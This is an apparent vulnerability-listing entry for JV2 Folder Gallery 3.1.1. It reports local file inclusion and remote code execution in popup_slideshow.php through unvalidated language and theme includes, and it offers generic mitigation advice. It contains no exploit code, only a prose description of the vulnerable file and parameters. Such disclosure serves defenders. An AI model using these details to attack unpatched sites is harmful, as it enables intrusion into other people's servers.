vendor:
JV2 Folder Gallery
by:
eidelweiss
9,8
CVSS
HIGH
Local File Inclusion (LFI) and Remote Code Execution (RCE)
98
CWE
Product Name: JV2 Folder Gallery
Affected Version From: 3.1.1
Affected Version To: 3.1.1
Patch Exists: NO
Related CWE: N/A
CPE: JV2 Folder Gallery
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Web
2020
JV2 Folder Gallery 3.1.1 (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 is vulnerable to Local File Inclusion (LFI) and Remote Code Execution (RCE). An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. The vulnerable code is located in the popup_slideshow.php file, which includes the language, gallerytheme, and file_handling.php files without proper validation. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. The attacker can use the LFI vulnerability to include a malicious file from the local system or a remote system. The attacker can also use the RCE vulnerability to execute arbitrary code on the vulnerable system.
Mitigation:
The application should validate user input and filter out any malicious code. The application should also use a whitelist of allowed characters and reject any input that does not match the whitelist.
